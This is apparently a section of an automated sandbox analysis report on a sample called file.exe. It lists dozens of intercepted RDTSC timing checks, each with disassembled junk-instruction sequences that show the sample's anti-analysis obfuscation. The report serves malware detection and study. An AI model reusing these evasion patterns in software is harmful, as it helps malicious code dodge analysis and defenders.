                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830757 second address: 830787 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F6C698AAEF1h 0x00000012 pop eax 0x00000013 jmp 00007F6C698AAEF1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830A10 second address: 830A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8373F0 second address: 83740E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837560 second address: 837595 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C6956DA46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jbe 00007F6C6956DA46h 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 jns 00007F6C6956DA46h 0x0000001e jmp 00007F6C6956DA56h 0x00000023 pop edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8376E6 second address: 8376EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8376EC second address: 8376F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837C47 second address: 837C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8389E3 second address: 8389F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F6C6956DA46h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8389F4 second address: 8389F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838F80 second address: 838F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6C6956DA56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C341 second address: 83C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007F6C698AAEEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C698AAEF9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C7BD second address: 83C7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C930 second address: 83C934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C934 second address: 83C93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CAA9 second address: 83CABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C698AAEF0h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CABE second address: 83CAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CD57 second address: 83CD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CD5F second address: 83CD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847B4B second address: 847B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847FD9 second address: 847FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847FDD second address: 847FE7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848627 second address: 84863E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C6956DA51h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84863E second address: 848642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848642 second address: 848669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C6956DA58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F6C6956DA46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84895A second address: 84895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84895E second address: 848962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848962 second address: 848983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F6C698AAEE6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848983 second address: 8489A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84920C second address: 849217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849983 second address: 849988 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849988 second address: 849991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849991 second address: 849995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8513DC second address: 8513E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C698AAEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8513E6 second address: 8513F0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C6956DA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850F4A second address: 850F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850F4E second address: 850F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850F54 second address: 850F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F6C698AAEE6h 0x0000000f jmp 00007F6C698AAEF9h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850F7D second address: 850F87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C6956DA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8510C2 second address: 8510C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8510C8 second address: 8510CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D62A second address: 85D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D779 second address: 85D7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6C6956DA4Fh 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F6C6956DA46h 0x00000010 jmp 00007F6C6956DA51h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FC70 second address: 85FC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C698AAEF2h 0x00000009 jmp 00007F6C698AAEF8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FC9E second address: 85FCE4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6C6956DA4Bh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 ja 00007F6C6956DA4Ch 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 jng 00007F6C6956DA46h 0x00000027 push edx 0x00000028 pop edx 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6C6956DA4Ch 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868EA6 second address: 868EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF7h 0x00000007 jmp 00007F6C698AAEF9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F6C698AAEFAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8707E9 second address: 8707FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA4Ch 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87067E second address: 870688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870688 second address: 87068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873821 second address: 873829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A2CE second address: 87A2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A2D4 second address: 87A2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878A30 second address: 878A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878A36 second address: 878AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 js 00007F6C698AAF05h 0x0000000d jmp 00007F6C698AAEF9h 0x00000012 jns 00007F6C698AAEE6h 0x00000018 jbe 00007F6C698AAEE8h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F6C698AAEF6h 0x00000026 pushad 0x00000027 popad 0x00000028 je 00007F6C698AAEE6h 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 je 00007F6C698AAEE6h 0x00000039 push eax 0x0000003a pop eax 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d push edx 0x0000003e pop edx 0x0000003f popad 0x00000040 push esi 0x00000041 push eax 0x00000042 pop eax 0x00000043 jmp 00007F6C698AAEECh 0x00000048 pop esi 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878C32 second address: 878C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878C36 second address: 878C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878C3A second address: 878C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878F72 second address: 878F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878F78 second address: 878F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87921D second address: 879221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879221 second address: 87923F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F6C6956DA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F6C6956DA4Ch 0x00000012 jnl 00007F6C6956DA46h 0x00000018 pop esi 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87923F second address: 879243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E974 second address: 87E983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6C6956DA46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E983 second address: 87E987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E987 second address: 87E98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E4DC second address: 87E4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E666 second address: 87E66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E66C second address: 87E671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E671 second address: 87E679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E679 second address: 87E67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E67D second address: 87E686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889FB3 second address: 889FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6C698AAEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898082 second address: 898088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898088 second address: 8980A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F6C698AAEECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B023 second address: 89B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jng 00007F6C6956DA52h 0x0000000c jp 00007F6C6956DA46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B037 second address: 89B051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6C698AAEEAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007F6C698AAEE6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC7C second address: 89AC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA51h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AD9C second address: 89ADA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ADA0 second address: 89ADB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6C6956DA4Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ADB0 second address: 89ADB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC3F0 second address: 8AC3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC3F4 second address: 8AC404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F6C698AAEEEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB230 second address: 8AB236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB236 second address: 8AB23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB23C second address: 8AB262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Eh 0x00000007 jmp 00007F6C6956DA51h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB3CC second address: 8AB427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C698AAEE6h 0x0000000a jng 00007F6C698AAEEEh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jne 00007F6C698AAEE6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F6C698AAF10h 0x00000021 jmp 00007F6C698AAEF0h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB6D8 second address: 8AB6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB6DE second address: 8AB6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB85F second address: 8AB86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA4Bh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABCA3 second address: 8ABCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABCB0 second address: 8ABCC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABDE5 second address: 8ABDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF5B second address: 8ABF72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F6C6956DA46h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF72 second address: 8ABF92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEECh 0x00000007 jg 00007F6C698AAEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F6C698AAEE6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF243 second address: 8AF248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF248 second address: 8AF252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF252 second address: 8AF261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F6C6956DA4Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF261 second address: 8AF272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F6C698AAEE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF272 second address: 8AF276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0877 second address: 8B087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B087D second address: 8B0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA4Ch 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
